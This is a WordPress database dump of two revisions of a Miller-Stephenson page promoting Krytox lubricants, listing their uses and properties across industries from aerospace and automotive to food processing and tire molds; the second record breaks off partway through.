INSERT INTO `wp_posts` VALUES (2122, 2, '2016-09-28 19:39:49', '2016-09-28 19:39:49', '[row col_style="dashed"]\n\n[col span="4" span__sm="12"]\n\n<p><a href="#aerospace">Aerospace, Aviation, and National Defense</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Automotive - Squeak &amp; Rattle</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Automotive - Mechanical Systems</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Box Board Corrugating</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Chemical and Petrochemical</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Electronics / Semiconductor</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Food Processing</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Medical Industry</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Metal Processing</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Oxygen &amp; Reactive Gas Service</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Power Generation</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Pulp &amp; Paper</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Textile</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Tire Mold</a></p>\n\n[/col]\n\n[/row]\n<p><span style="font-size: 130%;"><strong>Industries and Applications</strong></span></p>\n<p><strong>Aerospace, Aviation, and National Defense</strong></p>\n<ul>\n<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\n<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\n</ul>\n<p>Based on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:</p>\n<ul>\n<li>Low outgassing • Wide temperature range</li>\n<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\n<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\n</ul>\n<p>General Applications</p>\n<ul>\n<li>Bearings—all types</li>\n<li>Seals—valves and pumps</li>\n<li>O-rings—sealants, lubricants</li>\n</ul>\n<p>Aerospace-Specific Applications</p>\n<ul>\n<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\n<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\n<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\n<li>Mechanical components—spline shafts, control linkages</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Automotive—Squeak and Rattle</strong></p>\n<p>Miller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.</p>\n[ux_product_categories ids="37,46,96,97,98" number="10"]\n\n<p><strong>Automotive—Mechanical Systems</strong></p>\n<p>Design/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:</p>\n<ul>\n<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\n<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\n</ul>\n<p>The public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:</p>\n<ul>\n<li>A wide temperature range</li>\n<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\n<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\n<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\n<li>Chassis: wheel bearings, CV/universal joints</li>\n</ul>\n<p>• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers</p>\n<p>Krytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.</p>\n[ux_product_categories ids="37,46,96,97,98" number="10"]\n\n<p><strong>Chemical and Petrochemical</strong></p>\n<p>Miller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:</p>\n<ul>\n<li>Extended equipment life</li>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, valves</li>\n<li>BAM certification</li>\n</ul>\n<p>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.</p>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Box Board Corrugating</strong></p>\n<p>Krytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:</p>\n<ul>\n<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\n<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\n<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\n<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\n</ul>\n<p>Krytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>Long-term wear resistance</li>\n<li>Decreased wear and bearing failure</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>No carbonization</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Water, steam, and chemical resistant in the most severe environments</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Electronics/Semiconductor</strong></p>\n<p>Krytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:</p>\n<ul>\n<li>Wet and dry vacuum pumps</li>\n<li>Vacuum system sealants</li>\n<li>Clean rooms</li>\n<li>Robotics</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\n<li>Bearings</li>\n<li>Valves</li>\n<li>Seals</li>\n<li>O-rings</li>\n<li>Chains</li>\n<li>Compressors</li>\n<li>Gear boxes</li>\n<li>Mechanical pumps and other components</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Food Processing</strong></p>\n<p>Krytox lubricants for use in the food processing industry are:</p>\n<ul>\n<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\n<li>Able to protect bearings and other components under all load and speed conditions</li>\n<li>Available in a full line of H-1 PFPE lubricants</li>\n</ul>\n<p>Krytox oils and greases offer unmatched stability and flexibility:</p>\n<ul>\n<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\n<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Medical Industry Equipment Applications </strong></p>\n<p>In medical applications, Krytox lubricants offer safety and efficacy:</p>\n<ul>\n<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Metal Processing </strong></p>\n<p>With high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.</p>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Oxygen and Reactive Gas Service </strong></p>\n<p>When working with reactive gas equipment, failure is not an option.</p>\n<p>Conventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.</p>\n<p>Reactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:</p>\n<ul>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, and valves</li>\n<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\n</ul>\n<p>Lubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.</p>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Power Generation</strong></p>\n<p>Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.</p>\n<p>Krytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\n<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\n<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Pulp and Paper</strong></p>\n<p>Choose the lubricant that can move pulp and paper productivity to new levels.</p>\n<p>In the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:</p>\n<ul>\n<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\n<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\n<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\n</ul>\n<p>As in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.</p>\n<p>Krytox technology can help provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\n<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Textile</strong></p>\n<p>Krytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.</p>\n<p>Krytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>No oxidation or degradation</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Compatible with oxygen and chlorine</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Tire Mold</strong></p>\n<p>Krytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.</p>\n<ul>\n<li>High temperature performance</li>\n<li>Extended re-application interval</li>\n<li>Excellent adhesion</li>\n<li>High hydrolytic stability</li>\n<li>Elimination of carbon residue build-up on molds</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 19:39:49', '2016-09-28 19:39:49', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2123, 2, '2016-09-28 19:41:58', '2016-09-28 19:41:58', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<a name="Aerospace">\r\n<strong>Aerospace, Aviation, and National Defense</strong></a>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new 